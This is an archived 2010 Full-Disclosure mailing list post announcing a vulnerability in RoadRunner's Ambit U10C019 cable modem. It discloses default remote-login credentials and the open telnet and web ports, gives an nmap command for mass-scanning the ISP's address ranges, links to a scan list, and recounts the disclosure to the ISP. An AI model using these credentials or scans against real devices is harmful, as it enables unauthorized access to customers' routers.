lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20100810211539.GA29566@harryy.us>
Date: Tue, 10 Aug 2010 21:15:39 +0000
From: Harry Strongburg <harry.fd@...ry.lu>
To: full-disclosure@...ts.grok.org.uk
Subject: RoadRunner Ambit U10C019 CableModem Exploit

Hello. This is the introduction to a large-scale RoadRunner Cable-Router exploit on the Ambit U10C019 CableModem.

Basically, the default Cable Router that RoadRunner/TimeWarner gives to its customers by default:
 1) Allows for remote login with user: admin, password: cableroot.
 2) Allows remote access by default. (port 64623 for telnet, port 64680 for webui)

Devices affected:
Ambit U10C019 CableModem
Boot code revision : 2.1.6d
Hardware revision : 4.10
Software revision : 5.66.1026
Software build time : Feb 26 2009 12:53:26


Example for scanning the RoadRunner IP ranges:
nmap -PN -T5 --open -p64623 -n -P0 --max-retries 0 --host-timeout 5s -iL rr.lst >> nmap.log; cat nmap.log | grep -B 3 open > open.log

Torrent of files related to this disclosure at https://thepiratebay.org/torrent/5753559/
Contained in this archive contains:
 rr.lst - list of RoadRunner CIDR blocks.
 open-cleaned.txt - my initial scan of the ranges to see a rough estimate of number of affected devices.
 readme.txt - this file..
(You can also DDL it at http://harry.lu/files/torrents/rr-ambit-fd.tar.gz; I prfer you use the torrent option to save my bandwidth).


This hole appears to have been patched with a firmware update:

$ telnet device.ip 64623
Trying device.ip...
Connected to device.ip.
Escape character is '^]'.
Connection closed by foreign host.

$ curl -vvv 24.172.42.225:64680
* About to connect() to device.ip port 64680 (#0)
*   Trying device.ip... connected
* Connected to device.ip (device.ip) port 64680 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.21.0 (x86_64-unknown-linux-gnu) libcurl/7.21.0 OpenSSL/1.0.0a zlib/1.2.5
> Host: device.ip:64680
> Accept: */*
> 
* Empty reply from server
* Connection #0 to host device.ip left intact
curl: (52) Empty reply from server
* Closing connection #0


I use the phrase "appears", as I am unsure. Michael O'Donnel at Road Runner, who is the Chief of Security (if I recall correctly), said he would work 
on it. Later, I did not receive much more contact after the *8 weeks of time* after I contacted them. Recent attempts to contact Michael via leaving 
a voicemail got no reply. (Maybe I shouldn't have been so polite in my disclosure to them, if they don't even bother to contact me when it's fixed?)



Keep safe.
--
Harry Strongburg <harry.fd at harry.lu>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ